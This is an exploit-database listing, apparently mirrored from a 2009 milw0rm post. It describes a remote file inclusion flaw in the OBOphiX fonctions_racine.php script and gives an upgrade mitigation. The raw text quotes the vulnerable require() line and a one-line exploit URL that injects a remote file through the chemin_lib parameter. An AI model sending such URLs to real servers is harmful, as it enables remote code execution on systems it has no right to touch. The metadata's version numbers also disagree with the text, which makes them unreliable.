header-logo
Suggest Exploit
vendor:
OBOphiX [fonctions_racine.php]
by:
EA Ngel
9.3
CVSS
HIGH
Remote File Include Vulnerability
98
CWE
Product Name: OBOphiX [fonctions_racine.php]
Affected Version From: 2.7.2000
Affected Version To: 2.7.2000
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

OBOphiX [fonctions_racine.php] <= 2.7.0 Remote File Include Vulnerability

A vulnerability exists in OBOphiX [fonctions_racine.php] version 2.7.0 and earlier, which allows a remote attacker to include arbitrary files on the system. The vulnerability is due to the 'chemin_lib' parameter in the 'fonctions_racine.php' script not properly sanitizing user-supplied input. An attacker can exploit this vulnerability to include arbitrary files from remote web servers, which can lead to the execution of arbitrary code on the vulnerable system.

Mitigation:

Upgrade to OBOphiX [fonctions_racine.php] version 2.7.1 or later.
Source

Exploit-DB raw data:

[*] OBOphiX [fonctions_racine.php] <= 2.7.0 Remote File Include Vulnerability 


[+] Author	        : EA Ngel
[+] Location        : Manado - Indonesia
[+] Situs           : www[dot]manadocoding[dot]net
[+] Contact         : engelpemula@gmail.com
[+] Download Script : http://biznetnetworks.dl.sourceforge.net/project/obophix/obophix/pack%20complet%20V1.0/lib.V1.zip


[/] Dork            : cari sandiri jo neh <= :d


[#] Bug             : require("$chemin_lib/config.inc.php");


[^] 3xpl0it         : http://localhost/[path]/fonctions_racine.php?chemin_lib=[thanks.txt?]

                   
[@] Special Thanks  : str0ke, basix, kamuiclone, Mr.C, cokiki, bl4ck_3n9in3, cyberlog, dbanie, fl3xu5, exnome
                      g4pt3k, tonaas, doniskynet, rezagms, wishnu, my_wishdom, b0b0h0, jeckham, k3nz0, yadiyauri
                      akiko, steve_san, steve_diving, moon_lee, c6, bibeh^pink, missi, luv13, 
                      hyhgao, eyin, key, sansan and all friends


[!] Greetz to0     : cr4wl3r is companions in arms and cpu monitor, keyboard, mouse <= :d
                     
                     | gorontalodefacer[dot]org | sekuritionline[dot]net |


[^] Note            : Jangan pernah malu untuk menjadi seorang pemula

                      TUHAN MEMBERKATI  

# milw0rm.com [2009-09-09]

Navigation

Suggest Exploit

Services By CQR